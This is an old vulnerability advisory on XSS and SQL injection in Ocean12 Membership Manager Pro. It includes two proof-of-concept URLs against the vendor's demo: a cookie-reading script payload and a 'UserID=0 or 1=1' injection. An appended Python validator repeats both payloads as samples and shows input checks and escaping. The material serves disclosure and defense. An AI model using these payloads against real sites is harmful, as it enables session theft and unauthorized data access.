ocean12_xss_and_sql_inj.txt

17 Apr 2005, reported by Zinho, type: packetstorm, source: packetstormsecurity.com

Ocean12 Membership Manager Pro has XSS and SQL injection vulnerabilities rated high risk. The vendor did not respond to contact.

`Hackers Center Security Group (http://www.hackerscenter.com/)
Zinho's Security Advisory   
  
  
Title: Ocean12 Membership Manager Pro : XSS and Sql injection  
Risk: High   
Date: 5/04/2005   
Vendor: http://www.ocean12scripts.com  
"A membership manager application designed to allow a website owner   
to easily add password protected areas to their website"  
  
  
xss  
  
http://www.ocean12scripts.com/products/membership/demo/main.asp?UserID=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10
  
SQL INJECTION  
http://www.ocean12scripts.com/products/membership/demo/main.asp?UserID=0 or 1=1&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10
  
  
The vendor was contacted more than a month ago. No response has been received.
  
  
Author:   
Zinho is webmaster and founder of http://www.hackerscenter.com ,   
Security research portal   
  
zinho-no-spam @ hackerscenter.com   
  
  
  
  
  
`
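The two URLs in the advisory abuse the `page` and `UserID` query parameters of `main.asp`. The following is an added example, not code from the advisory or the vendor, showing server-side checks that reject both requests and the output encoding that neutralises the reflected value. The parameter contracts (integers for `UserID`, `page`, `DisplayNumber`; an allow-list for `Sort`) and the function names are assumptions inferred from the URLs.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Assumed contracts for main.asp's parameters (inferred from the advisory's
# URLs, not from vendor code): three non-negative integers and a sort column.
INT_PARAMS = ("UserID", "page", "DisplayNumber")
SORT_ALLOWED = {"Name"}  # assumption: the only value shown in the advisory


def check_request(url):
    """Return (parameter, reason) findings for one request URL."""
    # parse_qs percent-decodes, so encoded markup is judged in decoded form.
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    findings = []
    for name in INT_PARAMS:
        for value in params.get(name, []):
            if not (value.isascii() and value.isdigit()):
                findings.append((name, "not an integer"))
    for value in params.get("Sort", []):
        if value not in SORT_ALLOWED:
            findings.append(("Sort", "not an allowed column"))
    return findings


def reflect(value):
    """HTML-encode a value before writing it into markup or an attribute."""
    return html.escape(value, quote=True)


# Sample requests with the host removed. The first is a constructed benign
# request, the second carries the advisory's `page` value, and the third
# isolates the `UserID` value from the advisory's second URL.
SAMPLES = [
    "/main.asp?UserID=2&page=1&Sort=Name&DisplayNumber=10",
    "/main.asp?UserID=2&page=%22%3E%3Cscript%3Ealert(document.cookie)"
    "%3C/script%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10",
    "/main.asp?UserID=0 or 1=1&page=1&Sort=Name&DisplayNumber=10",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(check_request(sample) or "ok", "<-", sample[:40])
```

Type validation stops the non-numeric `UserID` before it reaches a query, but the query itself should still bind `UserID` as a parameter rather than concatenating it into the SQL string.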
